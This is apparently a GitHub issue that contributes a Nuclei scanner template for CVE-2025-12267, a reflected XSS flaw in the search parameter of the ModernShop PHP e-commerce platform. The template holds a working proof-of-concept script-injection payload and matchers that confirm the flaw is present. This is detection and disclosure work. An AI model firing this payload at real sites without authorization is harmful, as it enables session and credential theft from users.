-
Notifications
You must be signed in to change notification settings - Fork 3.2k
Open
Labels
template-contributionNuclei template contributionNuclei template contribution
Description
Is there an existing template for this?
- I have searched the existing templates.
Nuclei Template
id: cve-2025-12267
info:
name: ModernShop - Reflected XSS
author: 0xr2r
severity: high
description: |
Attacker can send a link containing a malicious URL in an email or instant message, allowing them to perform actions like stealing session tokens or login credentials.
tags: xss,cve,cve-2025-12267
reference:
- https://www.codester.com/items/comments/58847/modern-shop-php-ecommerce-platform
http:
- method: GET
path:
- "{{BaseURL}}/search?q=1bwkni><script>alert(1)</script>hu1c6"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<script>alert(1)</script>"
- type: status
status:
- 200Relevant dumped responses
Anything else?
No response
Metadata
Metadata
Assignees
Labels
template-contributionNuclei template contributionNuclei template contribution